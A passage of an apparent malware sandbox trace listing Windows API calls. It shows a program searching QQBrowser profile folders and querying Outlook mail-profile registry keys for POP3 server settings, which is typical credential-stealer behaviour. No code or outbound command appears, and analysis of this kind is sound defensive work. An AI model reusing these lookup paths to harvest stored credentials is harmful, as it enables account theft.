HALPmcxz\\AppData\\Roaming\\QQBrowser\\*.*" [0163.916] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QQBrowser\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x926360, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x926360, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0xa, ftLastWriteTime.dwHighDateTime=0xc, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x909f43, dwReserved1=0x3d00003d, cFileName="\r", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.916] VirtualQuery (in: lpAddress=0x8efeb0, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x8ef000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x38000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.916] GetProcessHeap () returned 0x8e0000 [0163.916] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8efeb0 | out: hHeap=0x8e0000) returned 1 [0163.916] VirtualQuery (in: lpAddress=0x909f48, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x909000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.916] GetProcessHeap () returned 0x8e0000 [0163.916] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x909f48 | out: hHeap=0x8e0000) returned 1 [0163.916] GetProcessHeap () returned 0x8e0000 [0163.916] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.916] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0163.916] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0163.916] lstrlenW (lpString="\\QQBrowser") returned 10 [0163.916] GetProcessHeap () returned 0x8e0000 [0163.916] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x6c) returned 0x90fb88 [0163.916] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0163.916] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\QQBrowser" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\QQBrowser") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\QQBrowser" [0163.916] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.916] GetProcessHeap () returned 0x8e0000 [0163.916] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.916] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\QQBrowser") returned 53 [0163.916] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\QQBrowser") returned 53 [0163.916] lstrlenW (lpString="\\*.*") returned 4 [0163.916] GetProcessHeap () returned 0x8e0000 [0163.916] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x74) returned 0x8efeb0 [0163.916] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\QQBrowser" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\QQBrowser") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\QQBrowser" [0163.916] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\QQBrowser", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\QQBrowser\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\QQBrowser\\*.*" [0163.916] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\QQBrowser\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x7ff, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x73084338, ftLastAccessTime.dwLowDateTime=0x912b80, ftLastAccessTime.dwHighDateTime=0x1, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x800002, nFileSizeHigh=0x8, nFileSizeLow=0x90fb70, dwReserved0=0x90fb70, dwReserved1=0x90fb6b, cFileName="", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.917] VirtualQuery (in: lpAddress=0x8efeb0, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x8ef000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x38000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.917] GetProcessHeap () returned 0x8e0000 [0163.917] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8efeb0 | out: hHeap=0x8e0000) returned 1 [0163.917] VirtualQuery (in: lpAddress=0x90fb88, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x90f000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x18000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.917] GetProcessHeap () returned 0x8e0000 [0163.917] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90fb88 | out: hHeap=0x8e0000) returned 1 [0163.917] GetProcessHeap () returned 0x8e0000 [0163.917] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.917] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0163.917] lstrlenW (lpString="C:\\ProgramData") returned 14 [0163.917] lstrlenW (lpString="\\QQBrowser") returned 10 [0163.917] GetProcessHeap () returned 0x8e0000 [0163.917] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x32) returned 0x8f9a40 [0163.917] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0163.917] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\QQBrowser" | out: lpString1="C:\\ProgramData\\QQBrowser") returned="C:\\ProgramData\\QQBrowser" [0163.917] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.917] GetProcessHeap () returned 0x8e0000 [0163.917] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.917] lstrlenW (lpString="C:\\ProgramData\\QQBrowser") returned 24 [0163.917] lstrlenW (lpString="C:\\ProgramData\\QQBrowser") returned 24 [0163.917] lstrlenW (lpString="\\*.*") returned 4 [0163.917] GetProcessHeap () returned 0x8e0000 [0163.917] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x3a) returned 0x8f2780 [0163.917] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\QQBrowser" | out: lpString1="C:\\ProgramData\\QQBrowser") returned="C:\\ProgramData\\QQBrowser" [0163.917] lstrcatW (in: lpString1="C:\\ProgramData\\QQBrowser", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\QQBrowser\\*.*") returned="C:\\ProgramData\\QQBrowser\\*.*" [0163.917] FindFirstFileW (in: lpFileName="C:\\ProgramData\\QQBrowser\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x7607cb17, ftCreationTime.dwLowDateTime=0xe, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x66001e, ftLastAccessTime.dwHighDateTime=0x24, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e75d0, nFileSizeLow=0x0, dwReserved0=0x1e, dwReserved1=0x7607c3d1, cFileName="", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.917] VirtualQuery (in: lpAddress=0x8f2780, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x8f2000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x35000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.917] GetProcessHeap () returned 0x8e0000 [0163.917] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f2780 | out: hHeap=0x8e0000) returned 1 [0163.917] VirtualQuery (in: lpAddress=0x8f9a40, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x8f9000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.917] GetProcessHeap () returned 0x8e0000 [0163.918] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f9a40 | out: hHeap=0x8e0000) returned 1 [0163.918] GetProcessHeap () returned 0x8e0000 [0163.918] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.918] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0163.918] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0163.918] lstrlenW (lpString="\\QQBrowser") returned 10 [0163.918] GetProcessHeap () returned 0x8e0000 [0163.918] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x70) returned 0x90fb88 [0163.918] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0163.918] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\QQBrowser" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QQBrowser") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QQBrowser" [0163.918] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.918] GetProcessHeap () returned 0x8e0000 [0163.918] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.918] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QQBrowser") returned 55 [0163.919] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QQBrowser") returned 55 [0163.919] lstrlenW (lpString="\\*.*") returned 4 [0163.919] GetProcessHeap () returned 0x8e0000 [0163.919] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x78) returned 0x8efeb0 [0163.919] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QQBrowser" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QQBrowser") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QQBrowser" [0163.919] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QQBrowser", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QQBrowser\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QQBrowser\\*.*" [0163.919] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QQBrowser\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x926360, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x926360, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0xa, ftLastWriteTime.dwHighDateTime=0xc, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x909f43, dwReserved1=0x3d00003d, cFileName="\r", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.919] VirtualQuery (in: lpAddress=0x8efeb0, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x8ef000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x38000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.919] GetProcessHeap () returned 0x8e0000 [0163.919] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8efeb0 | out: hHeap=0x8e0000) returned 1 [0163.919] VirtualQuery (in: lpAddress=0x90fb88, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x90f000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x18000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.919] GetProcessHeap () returned 0x8e0000 [0163.919] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90fb88 | out: hHeap=0x8e0000) returned 1 [0163.919] GetProcessHeap () returned 0x8e0000 [0163.919] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.919] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0163.919] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0163.919] lstrlenW (lpString="\\QQBrowser") returned 10 [0163.919] GetProcessHeap () returned 0x8e0000 [0163.919] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x6c) returned 0x90fb88 [0163.919] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0163.919] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\QQBrowser" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\QQBrowser") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\QQBrowser" [0163.919] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.919] GetProcessHeap () returned 0x8e0000 [0163.919] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.919] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\QQBrowser") returned 53 [0163.919] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\QQBrowser") returned 53 [0163.919] lstrlenW (lpString="\\*.*") returned 4 [0163.919] GetProcessHeap () returned 0x8e0000 [0163.919] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x74) returned 0x8efeb0 [0163.919] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\QQBrowser" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\QQBrowser") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\QQBrowser" [0163.920] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\QQBrowser", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\QQBrowser\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\QQBrowser\\*.*" [0163.920] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\QQBrowser\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x909f48, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x58, dwReserved1=0x10000010, cFileName="\r", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.920] VirtualQuery (in: lpAddress=0x8efeb0, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x8ef000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x38000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.920] GetProcessHeap () returned 0x8e0000 [0163.920] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8efeb0 | out: hHeap=0x8e0000) returned 1 [0163.920] VirtualQuery (in: lpAddress=0x90fb88, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x90f000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x18000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.920] GetProcessHeap () returned 0x8e0000 [0163.920] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90fb88 | out: hHeap=0x8e0000) returned 1 [0163.920] GetProcessHeap () returned 0x8e0000 [0163.920] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.920] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0163.920] lstrlenW (lpString="C:\\ProgramData") returned 14 [0163.920] lstrlenW (lpString="\\QQBrowser") returned 10 [0163.920] GetProcessHeap () returned 0x8e0000 [0163.920] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x32) returned 0x8f9a40 [0163.920] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0163.920] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\QQBrowser" | out: lpString1="C:\\ProgramData\\QQBrowser") returned="C:\\ProgramData\\QQBrowser" [0163.920] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.920] GetProcessHeap () returned 0x8e0000 [0163.920] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.920] lstrlenW (lpString="C:\\ProgramData\\QQBrowser") returned 24 [0163.920] lstrlenW (lpString="C:\\ProgramData\\QQBrowser") returned 24 [0163.920] lstrlenW (lpString="\\*.*") returned 4 [0163.920] GetProcessHeap () returned 0x8e0000 [0163.920] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x3a) returned 0x8f2780 [0163.920] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\QQBrowser" | out: lpString1="C:\\ProgramData\\QQBrowser") returned="C:\\ProgramData\\QQBrowser" [0163.920] lstrcatW (in: lpString1="C:\\ProgramData\\QQBrowser", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\QQBrowser\\*.*") returned="C:\\ProgramData\\QQBrowser\\*.*" [0163.920] FindFirstFileW (in: lpFileName="C:\\ProgramData\\QQBrowser\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x7607cb17, ftCreationTime.dwLowDateTime=0xe, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x5c001e, ftLastAccessTime.dwHighDateTime=0x26, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e75d0, nFileSizeLow=0x0, dwReserved0=0x1e, dwReserved1=0x7607c3d1, cFileName="", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.920] VirtualQuery (in: lpAddress=0x8f2780, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x8f2000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x35000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.921] GetProcessHeap () returned 0x8e0000 [0163.921] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f2780 | out: hHeap=0x8e0000) returned 1 [0163.921] VirtualQuery (in: lpAddress=0x8f9a40, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x8f9000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.921] GetProcessHeap () returned 0x8e0000 [0163.921] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f9a40 | out: hHeap=0x8e0000) returned 1 [0163.921] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0163.921] IStream:SetSize (This=0x9043c0, libNewSize=0x2ff) returned 0x0 [0163.921] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x2ff, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0163.921] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0163.921] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0163.921] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfadc*=0x0, cb=0x4, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x4) returned 0x0 [0163.921] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfae8*=0x9, cb=0x2, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x2) returned 0x0 [0163.921] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfaec*=0x0, cb=0x2, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x2) returned 0x0 [0163.921] _alloca_probe () returned 0x73846 [0163.921] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", phkResult=0x2dead8 | out: phkResult=0x2dead8*=0x100) returned 0x0 [0163.922] RegEnumKeyExW (in: hKey=0x100, dwIndex=0x0, lpName=0x2deae0, lpcchName=0x2deadc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="00000001", lpcchName=0x2deadc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0163.922] lstrlenW (lpString="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned 122 [0163.922] lstrlenW (lpString="\\") returned 1 [0163.922] GetProcessHeap () returned 0x8e0000 [0163.922] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf8) returned 0x926360 [0163.922] lstrcatW (in: lpString1="", lpString2="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676" [0163.922] lstrcatW (in: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", lpString2="\\" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\" [0163.922] lstrlenW (lpString="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\") returned 123 [0163.922] lstrlenW (lpString="00000001") returned 8 [0163.922] GetProcessHeap () returned 0x8e0000 [0163.922] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x108) returned 0x9252c8 [0163.922] lstrcatW (in: lpString1="", lpString2="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\" [0163.922] lstrcatW (in: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\", lpString2="00000001" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001" [0163.922] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2dea94, dwLength=0x1c | out: lpBuffer=0x2dea94*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.922] GetProcessHeap () returned 0x8e0000 [0163.922] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0163.922] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dea88 | out: phkResult=0x2dea88*=0x14c) returned 0x0 [0163.922] RegQueryValueExW (in: hKey=0x14c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x2dea8c, lpData=0x0, lpcbData=0x2dea98*=0x0 | out: lpType=0x2dea8c*=0x0, lpData=0x0, lpcbData=0x2dea98*=0x0) returned 0x2 [0163.922] RegCloseKey 